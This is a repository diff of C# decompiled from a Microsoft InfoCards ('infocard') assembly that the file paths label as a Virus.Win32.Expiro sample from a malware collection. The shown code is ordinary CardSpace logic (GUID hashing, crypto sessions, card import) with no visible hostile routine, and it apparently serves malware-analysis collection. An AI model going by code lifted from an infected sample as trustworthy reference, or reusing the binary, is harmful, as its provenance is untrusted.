(byte) 15,
(byte) 254,
(byte) 196,
(byte) 77,
(byte) 155,
(byte) 168
};
public GlobalId(byte[] guidBytes)
: this(new Guid(guidBytes))
{
}
public unsafe GlobalId(Guid guid)
{
fixed (GlobalId* globalIdPtr = &this)
*globalIdPtr = (GlobalId) guid;
}
public byte[] ToByteArray() => ((Guid) this).ToByteArray();
public override int GetHashCode() => ((Guid) this).GetHashCode();
public override bool Equals(object obj)
{
switch (obj)
{
case GlobalId _:
case Guid _:
return (GlobalId) obj == this;
default:
return false;
}
}
public override string ToString() => ((Guid) this).ToString("D");
public static bool operator !=(GlobalId a, GlobalId b) => !(a == b);
public static unsafe bool operator ==(GlobalId a, GlobalId b)
{
byte* numPtr1 = (byte*) &a;
byte* numPtr2 = (byte*) &b;
for (int index = 0; index < sizeof (GlobalId); ++index)
{
if ((int) numPtr1[index] != (int) numPtr2[index])
return false;
}
return true;
}
public static unsafe implicit operator Guid(GlobalId id) => *(Guid*) &id;
public static unsafe implicit operator GlobalId(Guid guid) => *(GlobalId*) &guid;
public static GlobalId DeriveFrom(string value)
{
value = !string.IsNullOrEmpty(value) ? value.Trim() : throw InfoCardTrace.ThrowHelperArgumentNull(nameof (value));
value = value.ToLower(CultureInfo.InvariantCulture);
using (SHA256Managed shA256Managed = new SHA256Managed())
{
byte[] numArray = new byte[Encoding.Unicode.GetByteCount(value) + GlobalId.HASHPREFIX.Length];
Array.Copy((Array) GlobalId.HASHPREFIX, 0, (Array) numArray, 0, GlobalId.HASHPREFIX.Length);
Encoding.Unicode.GetBytes(value, 0, value.Length, numArray, GlobalId.HASHPREFIX.Length);
byte[] hash = shA256Managed.ComputeHash(numArray);
return new GlobalId(new byte[16]
{
hash[3],
hash[2],
hash[1],
hash[0],
hash[5],
hash[4],
hash[7],
(byte) ((int) hash[6] & 15 | 48),
(byte) ((int) hash[8] & 63 | 128),
hash[9],
hash[10],
hash[11],
hash[12],
hash[13],
hash[14],
hash[15]
});
}
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/HandleDictionary`1.cs
+53
View File
@@ -0,0 +1,53 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.HandleDictionary`1
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Collections.Generic;
namespace Microsoft.InfoCards
{
internal class HandleDictionary<TVal>
{
private const int m_MaxSessionCount = 1073741823;
private Dictionary<int, TVal> m_internalDictionary;
private Random m_random;
public int MaxSize => 1073741823;
public TVal this[int Key]
{
get => this.m_internalDictionary[Key];
set
{
if (!this.ContainsHandle(Key))
throw InfoCardTrace.ThrowHelperError((Exception) new KeyNotFoundException());
this.m_internalDictionary[Key] = value;
}
}
public HandleDictionary()
{
this.m_internalDictionary = new Dictionary<int, TVal>();
this.m_random = new Random();
}
public int GetNewHandle()
{
if (this.m_internalDictionary.Count >= 1073741823)
throw InfoCardTrace.ThrowHelperError((Exception) new MaxSessionCountExceededException());
int key = this.m_random.Next();
while (this.m_internalDictionary.ContainsKey(key) || key == 0)
key = this.m_random.Next();
this.m_internalDictionary[key] = default (TVal);
return key;
}
public bool Remove(int key) => this.m_internalDictionary.Remove(key);
public bool ContainsHandle(int key) => this.m_internalDictionary.ContainsKey(key);
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/HashCoreRequest.cs
+55
View File
@@ -0,0 +1,55 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.HashCoreRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Principal;
namespace Microsoft.InfoCards
{
internal class HashCoreRequest : ClientRequest
{
private int m_cryptoSession;
private byte[] m_inBlock;
public HashCoreRequest(
Process callingProcess,
WindowsIdentity callingIdentity,
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs)
: base(callingProcess, callingIdentity, rpcHandle, inArgs, outArgs)
{
}
protected override void OnMarshalInArgs()
{
BinaryReader binaryReader = (BinaryReader) new InfoCardBinaryReader(this.InArgs);
this.m_cryptoSession = binaryReader.ReadInt32();
int count = binaryReader.ReadInt32();
this.m_inBlock = binaryReader.ReadBytes(count);
InfoCardTrace.ThrowInvalidArgumentConditional(0 == this.m_cryptoSession, "cryptoSession");
}
protected override void OnProcess()
{
try
{
((HashCryptoSession) CryptoSession.Find(this.m_cryptoSession, this.CallerPid, this.RequestorIdentity.User)).HashCore(this.m_inBlock);
}
finally
{
Array.Clear((Array) this.m_inBlock, 0, this.m_inBlock.Length);
}
}
protected override void OnMarshalOutArgs()
{
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/HashCryptoSession.cs
+60
View File
@@ -0,0 +1,60 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.HashCryptoSession
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Cryptography;
using System.Security.Principal;
namespace Microsoft.InfoCards
{
internal class HashCryptoSession : CryptoSession
{
private KeyedHashAlgorithm m_hash;
public HashCryptoSession(
Process process,
DateTime expiration,
WindowsIdentity identity,
KeyedHashAlgorithm hash)
: base(process, expiration, identity, (object) hash, CryptoSession.SessionType.Hash)
{
this.m_hash = hash;
}
protected override void OnDispose()
{
this.m_hash.Clear();
this.m_hash.Dispose();
this.m_hash = (KeyedHashAlgorithm) null;
}
protected override void OnWrite(BinaryWriter bwriter)
{
bwriter.Write(this.m_hash.HashSize);
bwriter.Write(this.m_hash.InputBlockSize);
bwriter.Write(this.m_hash.OutputBlockSize);
bwriter.Write(this.m_hash.CanTransformMultipleBlocks);
bwriter.Write(this.m_hash.CanReuseTransform);
}
public void HashCore(byte[] inData) => this.m_hash.TransformBlock(inData, 0, inData.Length, (byte[]) null, 0);
public byte[] HashFinal(byte[] inData)
{
try
{
this.m_hash.TransformFinalBlock(inData, 0, inData.Length);
}
finally
{
this.m_hash.Initialize();
}
return this.m_hash.Hash;
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/HashFinalRequest.cs
+54
View File
@@ -0,0 +1,54 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.HashFinalRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Principal;
namespace Microsoft.InfoCards
{
internal class HashFinalRequest : ClientRequest
{
private int m_cryptoSession;
private byte[] m_inBlock;
private byte[] m_outBlock;
public HashFinalRequest(
Process callingProcess,
WindowsIdentity callingIdentity,
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs)
: base(callingProcess, callingIdentity, rpcHandle, inArgs, outArgs)
{
}
protected override void OnMarshalInArgs()
{
BinaryReader binaryReader = (BinaryReader) new InfoCardBinaryReader(this.InArgs);
this.m_cryptoSession = binaryReader.ReadInt32();
int count = binaryReader.ReadInt32();
this.m_inBlock = binaryReader.ReadBytes(count);
InfoCardTrace.ThrowInvalidArgumentConditional(0 == this.m_cryptoSession, "cryptoSession");
}
protected override void OnProcess()
{
try
{
this.m_outBlock = ((HashCryptoSession) CryptoSession.Find(this.m_cryptoSession, this.CallerPid, this.RequestorIdentity.User)).HashFinal(this.m_inBlock);
}
finally
{
Array.Clear((Array) this.m_inBlock, 0, this.m_inBlock.Length);
}
}
protected override void OnMarshalOutArgs() => Utility.SerializeBytes(new BinaryWriter(this.OutArgs), this.m_outBlock);
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/HashUtility.cs
+54
View File
@@ -0,0 +1,54 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.HashUtility
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Security.Cryptography;
namespace Microsoft.InfoCards
{
internal static class HashUtility
{
public const string HashAlgorithmName = "SHA256";
private static object s_lock = new object();
private static SHA256Managed s_hasher = new SHA256Managed();
public static int HashBitLength => HashUtility.s_hasher.HashSize;
public static int HashBufferLength => HashUtility.HashBitLength / 8;
public static void SetHashValue(byte[] data, int dataIndex, byte[] dataToHash)
{
if (dataToHash == null)
throw InfoCardTrace.ThrowHelperArgumentNull(nameof (dataToHash));
HashUtility.SetHashValue(data, dataIndex, dataToHash, 0, dataToHash.Length);
}
public static void SetHashValue(
byte[] data,
int dataIndex,
byte[] dataToHash,
int dataToHashIndex,
int dataToHashSize)
{
if (data == null)
throw InfoCardTrace.ThrowHelperArgumentNull(nameof (data));
if (dataIndex < 0 || dataIndex >= data.Length)
throw InfoCardTrace.ThrowHelperError((Exception) new ArgumentOutOfRangeException(nameof (dataIndex), (object) dataIndex, SR.GetString("StoreHashUtilityDataOutOfRange")));
if (dataToHash == null)
throw InfoCardTrace.ThrowHelperArgumentNull(nameof (dataToHash));
if (dataToHashIndex < 0 || dataToHashIndex > dataToHash.Length)
throw InfoCardTrace.ThrowHelperError((Exception) new ArgumentOutOfRangeException(nameof (dataToHashIndex), (object) dataToHashIndex, SR.GetString("StoreHashUtilityDataToHashOutOfRange")));
if (dataToHashSize < 0 || dataToHashSize > dataToHash.Length - dataToHashIndex)
throw InfoCardTrace.ThrowHelperError((Exception) new ArgumentOutOfRangeException(nameof (dataToHashIndex), (object) dataToHashIndex, SR.GetString("StoreHashUtilityDataToHashOutOfRange")));
byte[] sourceArray = (byte[]) null;
lock (HashUtility.s_lock)
sourceArray = HashUtility.s_hasher.ComputeHash(dataToHash, dataToHashIndex, dataToHashSize);
Array.Copy((Array) sourceArray, 0, (Array) data, dataIndex, sourceArray.Length);
Array.Clear((Array) sourceArray, 0, sourceArray.Length);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/HttpProxyTransportBindingElement.cs
+93
View File
@@ -0,0 +1,93 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.HttpProxyTransportBindingElement
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System.Net;
using System.ServiceModel.Channels;
namespace Microsoft.InfoCards
{
internal class HttpProxyTransportBindingElement : TransportBindingElement
{
private HttpTransportBindingElement innerHttpTransport;
private IWebProxy proxy;
public static BindingElementCollection ReplaceHttpTransportWithProxy(
BindingElementCollection bindingElements,
IWebProxy proxy,
bool turnOffClientAuthOnTransport)
{
int index1 = -1;
for (int index2 = 0; index2 < bindingElements.Count; ++index2)
{
if (bindingElements[index2] is HttpTransportBindingElement)
{
index1 = index2;
break;
}
}
if (index1 == -1)
return bindingElements;
InfoCardTrace.Assert(index1 == bindingElements.Count - 1, "Transport should be last in the Binding Element list");
HttpTransportBindingElement bindingElement = (HttpTransportBindingElement) bindingElements[index1];
if (turnOffClientAuthOnTransport)
bindingElement.AuthenticationScheme = AuthenticationSchemes.Anonymous;
HttpProxyTransportBindingElement transportBindingElement = new HttpProxyTransportBindingElement(proxy, bindingElement);
bindingElements[index1] = (BindingElement) transportBindingElement;
return bindingElements;
}
private HttpProxyTransportBindingElement(
IWebProxy proxy,
HttpTransportBindingElement innerHttpTransport)
{
this.innerHttpTransport = innerHttpTransport;
this.proxy = proxy;
}
private HttpProxyTransportBindingElement(HttpProxyTransportBindingElement elementToBeCloned)
: base((TransportBindingElement) elementToBeCloned)
{
this.innerHttpTransport = elementToBeCloned.innerHttpTransport;
this.proxy = elementToBeCloned.proxy;
}
public override long MaxBufferPoolSize
{
get => this.innerHttpTransport.MaxBufferPoolSize;
set => this.innerHttpTransport.MaxBufferPoolSize = value;
}
public override long MaxReceivedMessageSize
{
get => this.innerHttpTransport.MaxReceivedMessageSize;
set => this.innerHttpTransport.MaxReceivedMessageSize = value;
}
public override string Scheme => this.innerHttpTransport.Scheme;
public override IChannelFactory<TChannel> BuildChannelFactory<TChannel>(
BindingContext context)
{
this.innerHttpTransport.Proxy = this.proxy;
return this.innerHttpTransport.BuildChannelFactory<TChannel>(context);
}
public override IChannelListener<TChannel> BuildChannelListener<TChannel>(
BindingContext context)
{
return this.innerHttpTransport.BuildChannelListener<TChannel>(context);
}
public override bool CanBuildChannelFactory<TChannel>(BindingContext context) => this.innerHttpTransport.CanBuildChannelFactory<TChannel>(context);
public override bool CanBuildChannelListener<TChannel>(BindingContext context) => this.innerHttpTransport.CanBuildChannelListener<TChannel>(context);
public override BindingElement Clone() => (BindingElement) new HttpProxyTransportBindingElement(this);
public override T GetProperty<T>(BindingContext context) => this.innerHttpTransport.GetProperty<T>(context);
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/IAccessibilityHelper.cs
+29
View File
@@ -0,0 +1,29 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.IAccessibilityHelper
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System.Security.Principal;
namespace Microsoft.InfoCards
{
internal interface IAccessibilityHelper
{
void Stop();
void RestartOnInfoCardDesktop(
uint userATApplicationFlags,
SafeNativeHandle hTrustedUserToken,
ref string trustedUserSid,
string infocardDesktop,
int userSessionId,
uint userProcessId,
WindowsIdentity userIdentity);
bool RestartOnUsersDesktop(
uint userProcessId,
string userDesktop,
WindowsIdentity userIdentity);
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/ICanonicalizer.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.ICanonicalizer
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
namespace Microsoft.InfoCards
{
internal interface ICanonicalizer
{
bool CanCanonicalize(object obj);
byte[] Canonicalize(object obj);
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/ITokenFactory.cs
+19
View File
@@ -0,0 +1,19 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.ITokenFactory
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
namespace Microsoft.InfoCards
{
internal interface ITokenFactory
{
void Abort();
TokenDescriptor CreateToken(
InfoCard card,
TokenFactoryCredential credential,
InfoCardPolicy policy,
bool discloseOptional);
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/IdentityValidationException.cs
+36
View File
@@ -0,0 +1,36 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.IdentityValidationException
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Runtime.Serialization;
namespace Microsoft.InfoCards
{
internal class IdentityValidationException : InfoCardBaseException
{
private const int HRESULT = -1073413885;
public IdentityValidationException()
: base(-1073413885)
{
}
public IdentityValidationException(string message)
: base(-1073413885, message)
{
}
public IdentityValidationException(string message, Exception inner)
: base(-1073413885, message, inner)
{
}
protected IdentityValidationException(SerializationInfo si, StreamingContext sc)
: base(-1073413885, si, sc)
{
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/ImportException.cs
+36
View File
@@ -0,0 +1,36 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.ImportException
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Runtime.Serialization;
namespace Microsoft.InfoCards
{
internal class ImportException : InfoCardBaseException
{
private const int HRESULT = -1073413884;
public ImportException()
: base(-1073413884)
{
}
public ImportException(string message)
: base(-1073413884, message)
{
}
public ImportException(string message, Exception inner)
: base(-1073413884, message, inner)
{
}
protected ImportException(SerializationInfo si, StreamingContext sc)
: base(-1073413884, si, sc)
{
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/ImportFileRequest.cs
+102
View File
@@ -0,0 +1,102 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.ImportFileRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Collections.Generic;
using System.IO;
namespace Microsoft.InfoCards
{
internal class ImportFileRequest : UIAgentRequest
{
public ImportFileRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnMarshalInArgs()
{
}
protected override void OnProcess()
{
RoamingStoreFile context = this.ParentRequest.GetContext<RoamingStoreFile>();
if (context == null)
return;
if (context.Cards == null)
return;
try
{
StoreConnection connection = StoreConnection.GetConnection();
try
{
connection.BeginTransaction();
try
{
foreach (InfoCard card in (IEnumerable<InfoCard>) context.Cards)
{
DataRow singleRow = connection.GetSingleRow(QueryDetails.FullRow, new List<QueryParameter>()
{
new QueryParameter("ix_objecttype", new object[1]
{
(object) 1
}),
new QueryParameter("ix_globalid", new object[1]
{
(object) GlobalId.DeriveFrom(card.Id.ToString())
})
}.ToArray());
if (singleRow != null)
{
using (MemoryStream memoryStream = new MemoryStream(singleRow.GetDataField()))
{
if (new InfoCard((Stream) memoryStream).LastUpdate < card.LastUpdate)
{
card.IsImported = true;
card.InstalledOn = DateTime.Now;
card.Save(connection);
}
}
}
else
{
card.IsImported = true;
card.InstalledOn = DateTime.Now;
card.Save(connection);
}
}
connection.CommitTransaction();
AuditLog.AuditStoreImport();
}
catch (Exception ex)
{
connection.RollbackTransaction();
if (!InfoCardTrace.IsFatal(ex))
throw InfoCardTrace.ThrowHelperError((Exception) new ImportStoreException(SR.GetString("InvalidImportFile"), ex));
throw;
}
}
finally
{
connection.Close();
}
}
finally
{
context.Clear();
}
}
protected override void OnMarshalOutArgs()
{
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/ImportRequest.cs
+91
View File
@@ -0,0 +1,91 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.ImportRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Principal;
using System.Text;
namespace Microsoft.InfoCards
{
internal class ImportRequest : ClientUIRequest
{
private FileStream m_importFile;
private string m_filename;
public ImportRequest(
Process callingProcess,
WindowsIdentity callingIdentity,
InfoCardUIAgent uiAgent,
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs)
: base(callingProcess, callingIdentity, uiAgent, rpcHandle, inArgs, outArgs, InfoCardUIAgent.CallMode.Import, ExceptionList.AllNonFatal)
{
}
public string ImportedFile => this.m_filename;
protected override void OnMarshalInArgs()
{
string path = Utility.DeserializeString((BinaryReader) new InfoCardBinaryReader(this.InArgs, Encoding.Unicode));
if (string.IsNullOrEmpty(path) || path.Length > 259)
throw InfoCardTrace.ThrowHelperError((Exception) new ImportException(SR.GetString("InvalidImportFileName")));
if (!Path.IsPathRooted(path))
throw InfoCardTrace.ThrowHelperError((Exception) new ImportException(SR.GetString("InvalidImportFileName")));
try
{
this.m_filename = path;
this.m_importFile = new FileStream(this.m_filename, FileMode.Open, FileAccess.Read, FileShare.Read);
}
catch (ArgumentException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new ImportException(SR.GetString("CannotOpenImportFile"), (Exception) ex));
}
catch (IOException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new ImportException(SR.GetString("CannotOpenImportFile"), (Exception) ex));
}
catch (NotSupportedException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new ImportException(SR.GetString("CannotOpenImportFile"), (Exception) ex));
}
catch (UnauthorizedAccessException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new ImportException(SR.GetString("CannotOpenImportFile"), (Exception) ex));
}
}
protected override void OnProcess() => this.StartAndWaitForUIAgent();
protected override void OnMarshalOutArgs()
{
}
protected override void OnDisposeAsUser()
{
base.OnDisposeAsUser();
if (this.m_importFile == null)
return;
this.m_importFile.Dispose();
this.m_importFile = (FileStream) null;
}
protected override bool OnHandleException(Exception e, out int errorCode)
{
errorCode = 0;
bool flag = false;
if (e is UserCancelledException)
{
errorCode = (e as UserCancelledException).NativeHResult;
flag = true;
}
return flag;
}
}
}

Some files were not shown because too many files have changed in this diff Show More